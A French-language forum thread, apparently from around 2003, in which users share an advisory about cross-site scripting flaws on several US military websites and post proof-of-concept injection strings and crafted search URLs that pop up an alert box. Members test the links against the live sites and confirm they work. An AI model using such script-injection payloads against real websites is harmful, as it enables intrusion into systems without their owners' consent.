Failles CSS sur sites militaires

[Nocte]

Voici mon advisory paru sur mon site (http://dealerhacksecurity.free.fr) et publié sur <!-- BBCode auto-link start --><a href="http://www.security-corporation.com/index.php?id=articles&a=20030404-002." target="_blank">http://www.security-corporation.com/index.php?id=articles&a=20030404-002.</a><!-- BBCode auto-link end --> <BR> <BR>Imaginez-vous! Une faille si basique touchée par un si grand nombre...

[DgSe95]

halucinant !!! <BR> <BR>y a rien a dire, de plus c'es toujours pas patché ! <IMG SRC="images/smiles/icon_eek.gif"> <IMG SRC="images/smiles/icon_eek.gif"> <BR> <BR>enfin à part les sites militaire qui apparement ne sont plus accecible : <BR> <BR> - PENTAGONE : <!-- BBCode auto-link start --><a href="http://www.defenselink.mil/search97/s97is.vts?Action=FilterSearch&Filter=dl.hts&ResultTemplate=dl_default.hts&query=%22%3E%3Cscript%3Ealert%28%27Nocte%27%29%3C%2Fscript%3E" target="_blank">http://www.defenselink.mil/search97/s97is.vts?Action=FilterSearch&Filter=dl.hts&ResultTemplate=dl_default.hts&query=%22%3E%3Cscript%3Ealert%28%27Nocte%27%29%3C%2Fscript%3E</a><!-- BBCode auto-link end --> <BR> <BR>- US AIR FORCE:http://www.af.mil/search/ <BR>and write in search field :"><script>alert('CSS by Nocte')</script> <BR> <BR>- US ARMY : <!-- BBCode auto-link start --><a href="http://www.lre.usace.army.mil/index.cfm?ChnName=Search" target="_blank">http://www.lre.usace.army.mil/index.cfm?ChnName=Search</a><!-- BBCode auto-link end --> <BR>and write in search field :"><script>alert('Nocte')</script> <BR> <BR>- The official site of The joint Chiefs of Staff : <!-- BBCode auto-link start --><a href="http://www.dtic.mil/jcs/" target="_blank">http://www.dtic.mil/jcs/</a><!-- BBCode auto-link end --> <BR>and write in search field : "><script>alert('Nocte')</script> <BR> <BR>- Defense Intelligence Agency : <!-- BBCode auto-link start --><a href="http://www.dia.mil/search" target="_blank">http://www.dia.mil/search</a><!-- BBCode auto-link end --> <BR>and write in search field : <script>alert('Nocte')</script> <BR> <BR>_________________ <BR>DgSe95 vous salut <BR> <BR><font size=-2></font><BR><BR><font size=-2></font>

[DgSe95]

test css sur ixus <BR> <BR><!-- BBCode auto-link start --><a href="http://www.defenselink.mil/search97/s97is.vts?Action=FilterSearch&Filter=dl.hts&ResultTemplate=dl_default.hts&query=%22%3E%3Cscript%3Ealert%28%27Nocte%27%29%3C%2Fscript%3E" target="_blank">http://www.defenselink.mil/search97/s97is.vts?Action=FilterSearch&Filter=dl.hts&ResultTemplate=dl_default.hts&query=%22%3E%3Cscript%3Ealert%28%27Nocte%27%29%3C%2Fscript%3E</a><!-- BBCode auto-link end --> <BR> <BR> <IMG SRC="images/smiles/icon_eek.gif">

[Vinzstyle]

Je vois pas ce que ça fait. Chez moi ça ouvre une fenetre avec écrit Nocte.

[DgSe95]

aïe vinsz ! tu veux dire que ça le fait sous ixus ou sur les liens que j'ai mis ??? <BR> <BR>tu as une fenetre qui s'ouvre c'est normal... c'est la faille de css, mais c'est simplement un exploit basique que tu vois, car si la fenetre s'ouvre cela veux dire que peut générer des commande beaucoup plus dangereuse.... <BR> <BR>nocte c'est l'auteur de la découverte de la faille

[Vinzstyle]

Sur IXUS je en sis pas, mais sur les liens que tu as mit (sites du gouvernement américain) ça le fait.

[DgSe95]

ok pour ixus, tu me rassure, c'est que bruno à bien corriger quand je l'ai informer <BR> <BR>pour les site américain, et bien c'est qu'ils sont vulnérable....

[Nocte]

lol